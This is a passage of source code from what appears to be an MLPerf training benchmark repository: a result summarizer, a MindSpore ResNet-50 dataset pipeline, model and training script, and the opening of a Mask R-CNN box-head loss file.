When dropped_scores > 0, then some scores have already been dropped
so we should not double count them
Precondition: Dropped scores have higher score value than the rest
"""
# Sort scores first
scores.sort()
# Remove top and bottom scores
countable_scores = scores[max_dropped_scores:len(scores)-(max_dropped_scores-dropped_scores)]
sum_of_scores = sum(countable_scores)
return sum_of_scores * 1.0 / len(countable_scores)
def _is_organization_folder(folder):
if not os.path.isdir(folder):
return False
systems_folder = os.path.join(folder, 'systems')
if not os.path.exists(systems_folder):
return False
results_folder = os.path.join(folder, 'results')
if not os.path.exists(results_folder):
return False
return True
def summarize_results(folder, ruleset):
"""Summarizes a set of results.
Args:
folder: The folder for a submission package.
ruleset: The ruleset such as 0.6.0, 0.7.0, or 1.0.0.
"""
systems_folder = os.path.join(folder, 'systems')
results_folder = os.path.join(folder, 'results')
rows = {}
for system_folder in _get_sub_folders(results_folder):
folder_parts = system_folder.split('/')
system = folder_parts[-1]
# Load corresponding system description.
system_file = os.path.join(
systems_folder, '{}.json'.format(system))
if not os.path.exists(system_file):
print('ERROR: Missing {}'.format(system_file))
continue
try:
desc = _read_json_file(system_file)
except:
print('ERROR: Could not decode JSON struct in {}'.format(system_file))
continue
# Construct prefix portion of the row.
row = ''
if 'division' not in desc:
print('ERROR: "division" field missing in {}'.format(system_file))
continue
row += '"{}",'.format(desc['division'])
if 'submitter' not in desc:
print('ERROR: "submitter" field missing in {}'.format(system_file))
continue
row += '"{}",'.format(desc['submitter'])
if 'system_name' not in desc:
print('ERROR: "system_name" field missing in {}'.format(system_file))
continue
row += '"{}",'.format(_pretty_system_name(desc))
if 'host_processor_model_name' not in desc:
print('ERROR: "host_processor_model_name" field missing in {}'.format(system_file))
continue
row += '"{}",'.format(desc['host_processor_model_name'])
if 'host_processor_core_count' not in desc:
print('ERROR: "host_processor_core_count" field missing in {}'.format(system_file))
continue
row += '{},'.format(int(desc['host_processors_per_node']) * int(desc['number_of_nodes']))
if 'accelerator_model_name' not in desc:
print('ERROR: "accelerator_model_name" field missing in {}'.format(system_file))
continue
row += '"{}",'.format(_pretty_accelerator_model_name(desc))
if 'accelerators_per_node' not in desc:
print('ERROR: "accelerators_per_node" field missing in {}'.format(system_file))
continue
row += '{},'.format(int(desc['accelerators_per_node']) * int(desc['number_of_nodes']))
if 'framework' not in desc:
print('ERROR: "framework" field missing in {}'.format(system_file))
continue
row += '"{}",'.format(_pretty_framework(desc))
# Collect scores for benchmarks.
benchmark_scores = {}
for benchmark_folder in _get_sub_folders(system_folder):
folder_parts = benchmark_folder.split('/')
benchmark = _benchmark_alias(folder_parts[-1])
# Read scores from result files.
pattern = '{folder}/result_*.txt'.format(folder=benchmark_folder)
result_files = glob.glob(pattern, recursive=True)
scores = []
dropped_scores = 0
for result_file in result_files:
score = _read_mlperf_score(result_file, ruleset)
if score is None:
dropped_scores += 1
else:
scores.append(score)
max_dropped_scores = 4 if benchmark == 'unet3d' else 1
if dropped_scores > max_dropped_scores:
print('CRITICAL ERROR: Too many non-converging runs for {} {}/{}'.
format(desc['submitter'], system, benchmark))
print('** CRITICAL ERROR ** Results in the table for {} {}/{} are NOT correct'.
format(desc['submitter'], system, benchmark))
elif dropped_scores >= 1:
print('NOTICE: Dropping non-converged run(s) for {} {}/{} using olympic scoring.'
.format(desc['submitter'], system, benchmark))
if dropped_scores <= max_dropped_scores:
benchmark_scores[benchmark] = _compute_olympic_average(scores, dropped_scores, max_dropped_scores)
# Construct scores portion of the row.
if ruleset == '0.6.0':
allowed_benchmarks = _ALLOWED_BENCHMARKS_V06
elif ruleset == '0.7.0':
allowed_benchmarks = _ALLOWED_BENCHMARKS_V07
elif ruleset == '1.0.0':
allowed_benchmarks = _ALLOWED_BENCHMARKS_V10
for benchmark in allowed_benchmarks:
if benchmark in benchmark_scores:
row += '{:.2f},'.format(benchmark_scores[benchmark])
else:
row += ','
# Construct postfix portion of the row.
row += '{},'.format(_details_url(desc, ruleset))
row += '{},'.format(_code_url(desc, ruleset))
rows[_row_key(desc)] = row
# Print rows in order of the sorted keys.
for key in sorted(rows):
print(rows[key])
def get_parser():
parser = argparse.ArgumentParser(
prog='mlperf_logging.result_summarizer',
description='Summarize a set of result files.',
)
parser.add_argument('folder', type=str,
help='the folder for a submission package')
parser.add_argument('usage', type=str,
help='the usage such as training, inference_edge, inference_server')
parser.add_argument('ruleset', type=str,
help='the ruleset such as 0.6.0, 0.7.0, or 1.0.0')
parser.add_argument('--werror', action='store_true',
help='Treat warnings as errors')
parser.add_argument('--quiet', action='store_true',
help='Suppress warnings. Does nothing if --werror is set')
return parser
def main():
parser = get_parser()
args = parser.parse_args()
if args.usage != 'training':
print('Usage {} is not supported.'.format(args.usage))
sys.exit(1)
if args.ruleset not in ['0.6.0', '0.7.0', '1.0.0']:
print('Ruleset {} is not supported.'.format(args.ruleset))
sys.exit(1)
multiple_folders_regex = r'(.*)\{(.*)\}'
multiple_folders = re.search(multiple_folders_regex, args.folder)
if multiple_folders:
# Parse results for multiple organizations.
path_prefix = multiple_folders.group(1)
path_suffix = multiple_folders.group(2)
if ',' in path_suffix:
orgs = multiple_folders.group(2).split(',')
elif '*' == path_suffix:
orgs = os.listdir(path_prefix)
orgs = [org for org in orgs
if _is_organization_folder(os.path.join(path_prefix, org))]
print('Detected organizations: {}'.format(', '.join(orgs)))
for org in orgs:
org_folder = path_prefix + org
summarize_results(org_folder, args.ruleset)
else:
# Parse results for single organization.
summarize_results(args.folder, args.ruleset)
if __name__ == '__main__':
main()
```
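`_compute_olympic_average` drops the extreme run times before averaging; with `max_dropped_scores == 1` and no already-dropped runs, that is the classic olympic score. A worked standalone example of the same arithmetic follows; the helper name is illustrative.

```python
def olympic_average(scores, dropped_scores, max_dropped_scores):
    # same slicing as _compute_olympic_average above
    scores = sorted(scores)
    countable = scores[max_dropped_scores:len(scores) - (max_dropped_scores - dropped_scores)]
    return sum(countable) / len(countable)

# five converged run times in minutes; drop the fastest and the slowest
print(olympic_average([21.0, 22.5, 23.0, 24.0, 30.0], dropped_scores=0, max_dropped_scores=1))
# -> (22.5 + 23.0 + 24.0) / 3 = 23.17 (approximately)
```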
#### File: implementations/mindspore_close_src/dataset.py
```python
import os
import numpy as np
import mindspore.common.dtype as mstype
import mindspore.dataset.engine as de
import mindspore.dataset.vision.c_transforms as C
import mindspore.dataset.transforms.c_transforms as C2
from PIL import Image
from io import BytesIO
import warnings
warnings.filterwarnings("ignore", "(Possibly )?corrupt EXIF data", UserWarning)
def create_dataset(dataset_path,
do_train,
image_size=224,
crop_min=0.08,
repeat_num=1,
batch_size=32,
num_workers=12):
"""
create a train or eval dataset
Args:
dataset_path(string): path to the dataset.
do_train(bool): whether the dataset is used for training or evaluation.
repeat_num(int): number of times to repeat the dataset. Default: 1
batch_size(int): batch size of the dataset. Default: 32
Returns:
dataset
"""
device_num = int(os.getenv("RANK_SIZE"))
rank_id = int(os.getenv('RANK_ID'))
if do_train:
ds = de.ImageFolderDataset(dataset_path, num_parallel_workers=num_workers, shuffle=True,
num_shards=device_num, shard_id=rank_id)
else:
batch_per_step = batch_size * device_num
print("eval batch per step:{}".format(batch_per_step))
if batch_per_step < 50000:
if 50000 % batch_per_step == 0:
num_padded = 0
else:
num_padded = batch_per_step - (50000 % batch_per_step)
else:
num_padded = batch_per_step - 50000
print("eval padded samples:{}".format(num_padded))
if num_padded != 0:
white_io = BytesIO()
Image.new('RGB',(224,224),(255,255,255)).save(white_io, 'JPEG')
padded_sample = {
"image": np.array(bytearray(white_io.getvalue()), dtype="uint8"),
"label": np.array(-1, np.int32)
}
sample = [padded_sample for x in range(num_padded)]
ds_pad = de.PaddedDataset(sample)
ds_imagefolder = de.ImageFolderDataset(dataset_path, num_parallel_workers=num_workers)
ds = ds_pad + ds_imagefolder
distributeSampler = de.DistributedSampler(num_shards=device_num, shard_id=rank_id, shuffle=False, num_samples=None)
ds.use_sampler(distributeSampler)
else:
ds = de.ImageFolderDataset(dataset_path, num_parallel_workers=num_workers, shuffle=False, num_shards=device_num, shard_id=rank_id)
mean = [0.485*255, 0.456*255, 0.406*255]
std = [0.229*255, 0.224*255, 0.225*255]
# define map operations
if do_train:
trans = [
C.RandomCropDecodeResize(image_size, scale=(crop_min, 1.0), ratio=(0.75, 1.333)),
C.RandomHorizontalFlip(prob=0.5),
C.Normalize(mean=mean, std=std),
C.HWC2CHW(),
C2.TypeCast(mstype.float16)
]
else:
trans = [
C.Decode(),
C.Resize(256),
C.CenterCrop(image_size),
C.Normalize(mean=mean, std=std),
C.HWC2CHW()
]
type_cast_op = C2.TypeCast(mstype.int32)
# apply dataset repeat operation
ds = ds.repeat(repeat_num)
ds = ds.map(input_columns="image", num_parallel_workers=num_workers, operations=trans)
ds = ds.map(input_columns="label", num_parallel_workers=num_workers, operations=type_cast_op)
ds = ds.batch(batch_size, drop_remainder=True)
return ds
```
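For evaluation, the dataset is padded with white images (label -1) so the 50,000 validation samples split into whole batches on every device. A small sketch of the padding count used above is given below; the helper name is hypothetical.

```python
def eval_padding(num_eval_samples, batch_size, device_num):
    # mirrors the num_padded computation in create_dataset above
    batch_per_step = batch_size * device_num
    if batch_per_step < num_eval_samples:
        remainder = num_eval_samples % batch_per_step
        return 0 if remainder == 0 else batch_per_step - remainder
    return batch_per_step - num_eval_samples

print(eval_padding(50000, 32, 16))   # 50000 % 512 = 336 -> pad 176 samples
```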
#### File: implementations/mindspore_close_src/resnet.py
```python
import numpy as np
from functools import partial
import mindspore.nn as nn
import mindspore.common.dtype as mstype
from mindspore.ops import operations as P
from mindspore.common.tensor import Tensor
from scipy.stats import truncnorm
from mindspore.nn import GlobalBatchNorm
from mindspore.common.initializer import HeUniform, HeNormal, XavierUniform
def _conv_variance_scaling_initializer(in_channel, out_channel, kernel_size):
fan_in = in_channel * kernel_size * kernel_size
scale = 1.0
scale /= max(1., fan_in)
stddev = (scale**0.5) / .87962566103423978
mu, sigma = 0, stddev
weight = truncnorm(-2, 2, loc=mu, scale=sigma).rvs(out_channel * in_channel * kernel_size * kernel_size)
weight = np.reshape(weight, (out_channel, in_channel, kernel_size, kernel_size))
return Tensor(weight, dtype=mstype.float32)
class LayerBuilder(object):
def __init__(self, conv_init_mode='truncnorm', bn_init_mode='adv_bn_init',
syncbn_idxs=(), syncbn_group_size=2):
assert conv_init_mode in ['truncnorm', 'HeUniform', 'XavierUniform', 'HeNormal']
assert bn_init_mode in ['adv_bn_init', 'conv_bn_init']
# conv
self.conv_init_mode = conv_init_mode
# batchnorm
self.bn_init_mode = bn_init_mode
self.bn_eps = 1e-5
self.bn_momentum = 0.9
def conv2d(self, in_channel, out_channel, kernel, stride=1):
if self.conv_init_mode == 'truncnorm':
weight = _conv_variance_scaling_initializer(in_channel, out_channel, kernel_size=kernel)
elif self.conv_init_mode == 'HeNormal':
weight = HeNormal(mode='fan_out', nonlinearity='relu')
elif self.conv_init_mode == 'HeUniform':
weight = 'HeUniform'
elif self.conv_init_mode == 'XavierUniform':
raise NotImplementedError
conv_op = nn.Conv2d(in_channel, out_channel, kernel_size=kernel, stride=stride,
padding=0, pad_mode='same', weight_init=weight)
return conv_op
def batchnorm2d(self, channel, is_last=False):
gamma_init = 0 if is_last and self.bn_init_mode == 'adv_bn_init' else 1
bn_op = nn.BatchNorm2d(channel, eps=self.bn_eps, momentum=self.bn_momentum,
gamma_init=gamma_init, beta_init=0, moving_mean_init=0, moving_var_init=1)
return bn_op
def fc(self, in_channel, out_channel):
weight = np.random.normal(loc=0, scale=0.01, size=out_channel * in_channel)
weight = Tensor(np.reshape(weight, (out_channel, in_channel)), dtype=mstype.float32)
fc_op = nn.Dense(in_channel, out_channel, has_bias=True, weight_init=weight, bias_init=0)
return fc_op
class ResidualBlock(nn.Cell):
"""
ResNet V1 residual block definition.
Args:
in_channel (int): Input channel.
out_channel (int): Output channel.
stride (int): Stride size for the first convolutional layer. Default: 1.
Returns:
Tensor, output tensor.
Examples:
>>> ResidualBlock(builder, 3, 256, stride=2)
"""
expansion = 4
def __init__(self,
builder,
in_channel,
out_channel,
stride=1):
super(ResidualBlock, self).__init__()
channel = out_channel // self.expansion
self.conv1 = builder.conv2d(in_channel, channel, 1, stride=1)
self.bn1 = builder.batchnorm2d(channel)
self.conv2 = builder.conv2d(channel, channel, 3, stride=stride)
self.bn2 = builder.batchnorm2d(channel)
self.conv3 = builder.conv2d(channel, out_channel, 1, stride=1)
self.bn3 = builder.batchnorm2d(out_channel, is_last=True)
self.relu = nn.ReLU()
self.down_sample = False
if stride != 1 or in_channel != out_channel:
self.down_sample = True
self.down_sample_layer = None
if self.down_sample:
self.down_sample_layer = nn.SequentialCell([
builder.conv2d(in_channel, out_channel, 1, stride),
builder.batchnorm2d(out_channel)])
self.add = P.Add()
def construct(self, x):
identity = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
if self.down_sample:
identity = self.down_sample_layer(identity)
out = self.add(out, identity)
out = self.relu(out)
return out
class ResNet(nn.Cell):
"""
ResNet architecture.
Args:
block (Cell): Block for network.
layer_nums (list): Numbers of block in different layers.
in_channels (list): Input channel in each layer.
out_channels (list): Output channel in each layer.
strides (list): Stride size in each layer.
num_classes (int): The number of classes that the training images are belonging to.
Returns:
Tensor, output tensor.
Examples:
>>> ResNet(ResidualBlock,
>>> [3, 4, 6, 3],
>>> [64, 256, 512, 1024],
>>> [256, 512, 1024, 2048],
>>> [1, 2, 2, 2],
>>> 10)
"""
def __init__(self,
block,
layer_nums,
in_channels,
out_channels,
strides,
num_classes,
conv_init_mode='truncnorm',
bn_init_mode='adv_bn_init'):
self.builder = LayerBuilder(conv_init_mode=conv_init_mode,
bn_init_mode=bn_init_mode)
super(ResNet, self).__init__()
if not len(layer_nums) == len(in_channels) == len(out_channels) == 4:
raise ValueError("the length of layer_num, in_channels, out_channels list must be 4!")
self.conv1 = self.builder.conv2d(3, 64, 7, stride=2)
self.bn1 = self.builder.batchnorm2d(64)
self.relu = P.ReLU()
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, pad_mode="same")
self.layer1 = self._make_layer(block,
layer_nums[0],
in_channel=in_channels[0],
out_channel=out_channels[0],
stride=strides[0])
self.layer2 = self._make_layer(block,
layer_nums[1],
in_channel=in_channels[1],
out_channel=out_channels[1],
stride=strides[1])
self.layer3 = self._make_layer(block,
layer_nums[2],
in_channel=in_channels[2],
out_channel=out_channels[2],
stride=strides[2])
self.layer4 = self._make_layer(block,
layer_nums[3],
in_channel=in_channels[3],
out_channel=out_channels[3],
stride=strides[3])
self.mean = P.ReduceMean(keep_dims=True)
self.flatten = nn.Flatten()
self.end_point = self.builder.fc(out_channels[3], num_classes)
def _make_layer(self, block, layer_num, in_channel, out_channel, stride):
"""
Make stage network of ResNet.
Args:
block (Cell): Resnet block.
layer_num (int): Layer number.
in_channel (int): Input channel.
out_channel (int): Output channel.
stride (int): Stride size for the first convolutional layer.
Returns:
SequentialCell, the output layer.
Examples:
>>> _make_layer(ResidualBlock, 3, 128, 256, 2)
"""
layers = []
resnet_block = block(self.builder, in_channel, out_channel, stride=stride)
layers.append(resnet_block)
for _ in range(1, layer_num):
resnet_block = block(self.builder, out_channel, out_channel, stride=1)
layers.append(resnet_block)
return nn.SequentialCell(layers)
def construct(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
c1 = self.maxpool(x)
c2 = self.layer1(c1)
c3 = self.layer2(c2)
c4 = self.layer3(c3)
c5 = self.layer4(c4)
out = self.mean(c5, (2, 3))
out = self.flatten(out)
out = self.end_point(out)
return out
def resnet50(backbone='resnet50',
class_num=10,
conv_init_mode='truncnorm',
bn_init_mode='adv_bn_init'):
"""
Get ResNet50 neural network.
Args:
class_num (int): Class number.
Returns:
Cell, cell instance of ResNet50 neural network.
Examples:
>>> net = resnet50(class_num=10)
"""
return ResNet(ResidualBlock,
[3, 4, 6, 3],
[64, 256, 512, 1024],
[256, 512, 1024, 2048],
[1, 2, 2, 2],
class_num,
conv_init_mode=conv_init_mode,
bn_init_mode=bn_init_mode)
```
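`_conv_variance_scaling_initializer` draws from a truncated normal and divides the target standard deviation by 0.8796..., which compensates for the variance lost when truncating at ±2σ. The standalone NumPy/SciPy check below illustrates that correction; it is a sketch, not part of the network code.

```python
import numpy as np
from scipy.stats import truncnorm

in_channel, kernel_size = 64, 3
fan_in = in_channel * kernel_size * kernel_size
target_std = (1.0 / fan_in) ** 0.5                    # variance-scaling target
stddev = target_std / 0.87962566103423978             # same correction as above

w = truncnorm(-2, 2, loc=0, scale=stddev).rvs(100000, random_state=0)
print(target_std, w.std())   # empirical std lands close to the target
```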
#### File: implementations/mindspore_close_src/train.py
```python
import os
import argparse
import numpy as np
import time
from mindspore import context
from mindspore import Tensor
from mindspore.nn.optim import LARS, Momentum
from mindspore.train.model import Model, ParallelMode
from mindspore.train.loss_scale_manager import FixedLossScaleManager
from mindspore.communication.management import init
import mindspore.dataset as ds
import mindspore.dataset.engine as de
from mlperf_logging import mllog
from dataset import create_dataset
from lr_generator import get_lr
from resnet import resnet50
from metric import DistAccuracy, ClassifyCorrectCell
from callback import StateMonitor
from cross_entropy import CrossEntropySmooth
from cfg_parser import merge_args
import moxing as mox
os.environ['MINDSPORE_HCCL_CONFIG_PATH'] = os.getenv('RANK_TABLE_FILE')
device_id = int(os.getenv('DEVICE_ID')) # 0 ~ 7
local_rank = int(os.getenv('RANK_ID')) # local_rank
device_num = int(os.getenv('RANK_SIZE')) # world_size
log_filename = os.path.join(os.getcwd(), "resnet50_rank"+ str(local_rank) +".log")
context.set_context(mode=context.GRAPH_MODE, device_target="Ascend", save_graphs=False)
context.set_context(device_id=device_id)
def parse_args():
parser = argparse.ArgumentParser(description='Image classification')
# cloud
parser.add_argument('--data_url', type=str, default=None, help='data_url')
parser.add_argument('--train_url', type=str, default='./', help='train_url')
# train datasets
parser.add_argument('--dataset_path', type=str, default='/opt/npu/datasets/imagenet/train', help='Dataset path')
parser.add_argument('--train_image_size', type=int, default=224, help='train_image_size')
parser.add_argument('--crop_min', type=float, default=0.08, help='Dataset path')
parser.add_argument('--batch_size', type=int, default=16, help='batch_size')
parser.add_argument('--train_num_workers', type=int, default=12, help='train_num_workers')
# eval datasets
parser.add_argument('--eval_path', type=str, default='/opt/npu/datasets/imagenet/val', help='Eval dataset path')
parser.add_argument('--eval_image_size', type=int, default=224, help='eval_image_size')
parser.add_argument('--eval_batch_size', type=int, default=16, help='eval_batch_size')
parser.add_argument('--eval_interval', type=int, default=4, help='eval_interval')
parser.add_argument('--eval_offset', type=int, default=-1, help='1 means 4*n+1 epochs')
parser.add_argument('--eval_num_workers', type=int, default=12, help='eval_num_workers')
# network
parser.add_argument('--backbone', type=str, default='resnet50', help='resnet50')
parser.add_argument('--class_num', type=int, default=1001, help='class_num')
parser.add_argument('--conv_init_mode', type=str, default='truncnorm', help='truncnorm/HeNormal/HeUniform')
parser.add_argument('--bn_init_mode', type=str, default='adv_bn_init', help='adv_bn_init/conv_bn_init')
# lr
parser.add_argument('--lr_decay_mode', type=str, default='poly', help='lr_decay_mode')
parser.add_argument('--poly_power', type=float, default=2, help='lars_opt_learning_rate_decay_poly_power')
parser.add_argument('--lr_init', type=float, default=0.0, help='lr_init')
parser.add_argument('--lr_max', type=float, default=0.8, help='lr_max')
parser.add_argument('--lr_min', type=float, default=0.0, help='lr_min')
parser.add_argument('--max_epoch', type=int, default=33, help='max_epoch')
parser.add_argument('--warmup_epochs', type=float, default=1, help='warmup_epochs')
# optimizer
parser.add_argument('--momentum', type=float, default=0.9, help='momentum')
parser.add_argument('--weight_decay', type=float, default=5e-5, help='weight_decay')
parser.add_argument('--use_nesterov', type=int, default=0, help='use_nesterov')
parser.add_argument('--use_lars', type=int, default=0, help='use_lars')
parser.add_argument('--lars_epsilon', type=float, default=0.0, help='lars_epsilon')
parser.add_argument('--lars_coefficient', type=float, default=0.001, help='lars_coefficient')
# loss
parser.add_argument('--loss_scale', type=int, default=1024, help='loss_scale')
parser.add_argument('--use_label_smooth', type=int, default=1, help='use_label_smooth')
parser.add_argument('--label_smooth_factor', type=float, default=0.1, help='label_smooth_factor')
# args_yml_fn
parser.add_argument('--args_yml_fn', type=str, default='', help='args_yml_fn')
# seed
parser.add_argument('--seed', type=int, default=1, help='seed')
# gradient_accumulation_steps, set to '1' for resnet
parser.add_argument('--gradient_accumulation_steps', type=int, default=1, help='gradient_accumulation_steps')
args = parser.parse_args()
args = merge_args(args, args.args_yml_fn)
args.use_nesterov = (args.use_nesterov == 1)
args.weight_decay = float(args.weight_decay)
if args.eval_offset < 0:
args.eval_offset = args.max_epoch % args.eval_interval
args.dataset_path = "/cache_mlperf/imagenet/train"
args.eval_path = "/cache_mlperf/imagenet/val"
return args
if __name__ == '__main__':
args = parse_args()
np.random.seed(args.seed)
context.set_auto_parallel_context(device_num=device_num,
parallel_mode=ParallelMode.DATA_PARALLEL,
gradients_mean=True)
# mllog
mllog.config(filename=log_filename)
mllog.config(
default_namespace="mindspore",
default_stack_offset=1,
default_clear_line=False,
root_dir=os.path.normpath(os.path.dirname(os.path.realpath(__file__))))
mllogger = mllog.get_mllogger()
# submission
mllogger.event(key=mllog.constants.SUBMISSION_BENCHMARK, value="resnet")
mllogger.event(key=mllog.constants.SUBMISSION_DIVISION, value="closed")
mllogger.event(key=mllog.constants.SUBMISSION_ORG, value="PCL & PKU")
mllogger.event(key=mllog.constants.SUBMISSION_PLATFORM, value="Ascend 910 ProA")
mllogger.event(key=mllog.constants.SUBMISSION_STATUS, value="cloud")
mllogger.event(key=mllog.constants.CACHE_CLEAR)
# init the distribute env
init()
# network
net = resnet50(backbone=args.backbone,
class_num=args.class_num,
conv_init_mode=args.conv_init_mode,
bn_init_mode=args.bn_init_mode)
# loss
if not args.use_label_smooth:
args.label_smooth_factor = 0.0
loss = CrossEntropySmooth(sparse=True,
reduction="mean",
smooth_factor=args.label_smooth_factor,
num_classes=args.class_num)
# train dataset
epoch_size = args.max_epoch
dataset = create_dataset(dataset_path=args.dataset_path,
do_train=True,
image_size=args.train_image_size,
crop_min=args.crop_min,
batch_size=args.batch_size,
num_workers=args.train_num_workers)
ds.config.set_seed(args.seed)
de.config.set_prefetch_size(64)
step_size = dataset.get_dataset_size()
args.steps_per_epoch = step_size
# evalutation dataset
eval_dataset = create_dataset(dataset_path=args.eval_path,
do_train=False,
image_size=args.eval_image_size,
batch_size=args.eval_batch_size,
num_workers=args.eval_num_workers)
eval_step_size = eval_dataset.get_dataset_size()
# evaluation network
dist_eval_network = ClassifyCorrectCell(net)
# loss scale
loss_scale = FixedLossScaleManager(args.loss_scale, drop_overflow_update=False)
# learning rate
lr_array = get_lr(global_step=0, lr_init=args.lr_init, lr_end=args.lr_min, lr_max=args.lr_max,
warmup_epochs=args.warmup_epochs, total_epochs=epoch_size, steps_per_epoch=step_size,
lr_decay_mode=args.lr_decay_mode, poly_power=args.poly_power)
lr = Tensor(lr_array)
decayed_params = []
no_decayed_params = []
for param in net.trainable_params():
if 'beta' not in param.name and 'gamma' not in param.name and 'bias' not in param.name:
decayed_params.append(param)
else:
no_decayed_params.append(param)
group_params = [{'params': decayed_params, 'weight_decay': args.weight_decay},
{'params': no_decayed_params},
{'order_params': net.trainable_params()}]
opt = Momentum(group_params, lr, args.momentum, loss_scale=args.loss_scale, use_nesterov=args.use_nesterov)
if args.use_lars:
opt = LARS(opt, epsilon=args.lars_epsilon, coefficient=args.lars_coefficient,
lars_filter=lambda x: 'beta' not in x.name and 'gamma' not in x.name and 'bias' not in x.name)
model = Model(net, loss_fn=loss, optimizer=opt, loss_scale_manager=loss_scale, amp_level="O2",
keep_batchnorm_fp32=False,
metrics={'acc': DistAccuracy(batch_size=args.eval_batch_size, device_num=device_num)},
eval_network=dist_eval_network,
total_steps=args.steps_per_epoch*args.max_epoch)
# set event
mllogger.event(key=mllog.constants.GLOBAL_BATCH_SIZE, value=args.batch_size * device_num)
mllogger.event(key="opt_name", value="lars")
mllogger.event(key="lars_opt_base_learning_rate", value=args.lr_max)
mllogger.event(key="lars_opt_end_learning_rate", value=args.lr_min)
mllogger.event(key="lars_opt_learning_rate_decay_poly_power", value=args.poly_power)
mllogger.event(key="lars_opt_learning_rate_decay_steps", value=step_size * (epoch_size - args.warmup_epochs))
mllogger.event(key="lars_epsilon", value=args.lars_epsilon)
mllogger.event(key="lars_opt_learning_rate_warmup_epochs", value=args.warmup_epochs)
mllogger.event(key="lars_opt_momentum", value=args.momentum)
mllogger.event(key="lars_opt_weight_decay", value=args.weight_decay)
mllogger.event(key="gradient_accumulation_steps", value=args.gradient_accumulation_steps)
mllogger.event(key="seed", value=args.seed)
state_cb = StateMonitor(data_size=step_size,
mllogger=mllogger,
tot_batch_size=args.batch_size * device_num,
lrs=lr_array,
model=model,
eval_dataset=eval_dataset,
eval_interval=args.eval_interval,
eval_offset=args.eval_offset)
cb = [state_cb, ]
# compile
mllogger.start(key=mllog.constants.INIT_START)
model._init(dataset, eval_dataset, sink_size=step_size, epoch=epoch_size)
mllogger.end(key=mllog.constants.INIT_STOP)
sync_path = os.path.join(args.train_url, "sync_compile")
if not mox.file.exists(sync_path):
mox.file.make_dirs(sync_path)
yml_name = os.path.splitext(os.path.split(args.args_yml_fn)[-1])[0]
s3_rank_ready_file = os.path.join(sync_path, '{}_{}.txt'.format(yml_name, local_rank))
if mox.file.exists(s3_rank_ready_file):
mox.file.remove(s3_rank_ready_file, recursive=False)
time.sleep(10)
mox.file.write(s3_rank_ready_file, '{}'.format(local_rank))
while local_rank == 0:
existed = []
all_rank_exist = True
for rank_item in range(device_num):
if rank_item not in existed:
rank_fn_item = os.path.join(sync_path, '{}_{}.txt'.format(yml_name, rank_item))
if not mox.file.exists(rank_fn_item):
print("rank_fn_item:{} is not exist".format(rank_fn_item))
all_rank_exist = False
break
else:
existed.append(rank_item)
if all_rank_exist:
break
else:
time.sleep(1)
# train and eval
mllogger.start(key=mllog.constants.RUN_START)
mllogger.event(key="train_samples", value=step_size*device_num*args.batch_size)
mllogger.event(key="eval_samples", value=eval_step_size*device_num*args.eval_batch_size)
model.train(epoch_size, dataset, callbacks=cb, sink_size=step_size, eval_interval=args.eval_interval)
mllogger.event(key=mllog.constants.RUN_STOP, metadata={"status": "success"})
# copy mllog
src = log_filename
mllog_dir = os.path.join(args.train_url, "mllog")
if not mox.file.exists(mllog_dir):
mox.file.make_dirs(mllog_dir)
dst = os.path.join(mllog_dir, "resnet50_mllog_rank_{}.log".format(local_rank))
mox.file.copy(src, dst)
```
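After graph compilation, the script synchronizes ranks through marker files on shared storage: every rank writes `{yml_name}_{rank}.txt`, and rank 0 polls until all markers exist before RUN_START. Below is a local-filesystem sketch of the same barrier using `os`/`open` instead of the moxing S3 client; the function and argument names are made up.

```python
import os
import time

def marker_file_barrier(sync_dir, tag, rank, world_size, poll_seconds=1.0):
    # every rank drops a marker file; rank 0 waits until all of them exist
    os.makedirs(sync_dir, exist_ok=True)
    with open(os.path.join(sync_dir, f'{tag}_{rank}.txt'), 'w') as f:
        f.write(str(rank))
    if rank != 0:
        return
    while True:
        missing = [r for r in range(world_size)
                   if not os.path.exists(os.path.join(sync_dir, f'{tag}_{r}.txt'))]
        if not missing:
            return
        time.sleep(poll_seconds)
```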
#### File: roi_heads/box_head/loss.py
```python
import torch
from torch.nn import functional as F
from maskrcnn_benchmark.layers import smooth_l1_loss
from maskrcnn_benchmark.structures.bounding_box import BoxList
from maskrcnn_benchmark.modeling.box_coder import BoxCoder
from maskrcnn_benchmark.modeling.matcher import Matcher
from maskrcnn_benchmark.structures.boxlist_ops import boxlist_iou, boxlist_iou_batched
from maskrcnn_benchmark.modeling.balanced_positive_negative_sampler import (
BalancedPositiveNegativeSampler
)
from maskrcnn_benchmark.modeling.utils import cat
from torch.nn.utils.rnn import pad_sequence
class FastRCNNLossComputation(object):
"""
Computes the loss for Faster R-CNN.
Also supports FPN
"""
def __init__(
self,
proposal_matcher,
fg_bg_sampler,
box_coder,
cls_agnostic_bbox_reg=False
):
"""
Arguments:
proposal_matcher (Matcher)
fg_bg_sampler (BalancedPositiveNegativeSampler)
box_coder (BoxCoder)
"""
self.proposal_matcher = proposal_matcher
self.fg_bg_sampler = fg_bg_sampler
self.box_coder = box_coder
self.cls_agnostic_bbox_reg = cls_agnostic_bbox_reg
self.const0123, self.const4567 = None, None
self.syncfree = True
def match_targets_to_proposals(self, proposal, target):
match_quality_matrix = boxlist_iou(target, proposal)
matched_idxs = self.proposal_matcher(match_quality_matrix)
# Fast RCNN only need "labels" field for selecting the targets
target = target.copy_with_fields("labels")
# get the targets corresponding GT for each proposal
# NB: need to clamp the indices because we can have a single
# GT in the image, and matched_idxs can be -2, which goes
# out of bounds
matched_targets = target[matched_idxs.clamp(min=0)]
matched_targets.add_field("matched_idxs", matched_idxs)
return matched_targets
def match_targets_to_proposals_batched(self, proposal, target):
match_quality_matrix = boxlist_iou_batched(target, proposal)
matched_idxs = self.proposal_matcher(match_quality_matrix, batched=1)
# Fast RCNN only need "labels" field for selecting the targets
# how to do this for batched case?
# target = target.copy_with_fields("labels")
return matched_idxs
def prepare_targets(self, proposals, targets):
labels = []
regression_targets = []
matched_idxs = []
for proposals_per_image, targets_per_image in zip(proposals, targets):
matched_targets_per_image = self.match_targets_to_proposals(
proposals_per_image, targets_per_image
)
matched_idxs_per_image = matched_targets_per_image.get_field("matched_idxs")
labels_per_image = matched_targets_per_image.get_field("labels")
labels_per_image = labels_per_image.to(dtype=torch.int64)
# Label background (below the low threshold)
bg_inds = matched_idxs_per_image == Matcher.BELOW_LOW_THRESHOLD
labels_per_image.masked_fill_(bg_inds, 0)
# Label ignore proposals (between low and high thresholds)
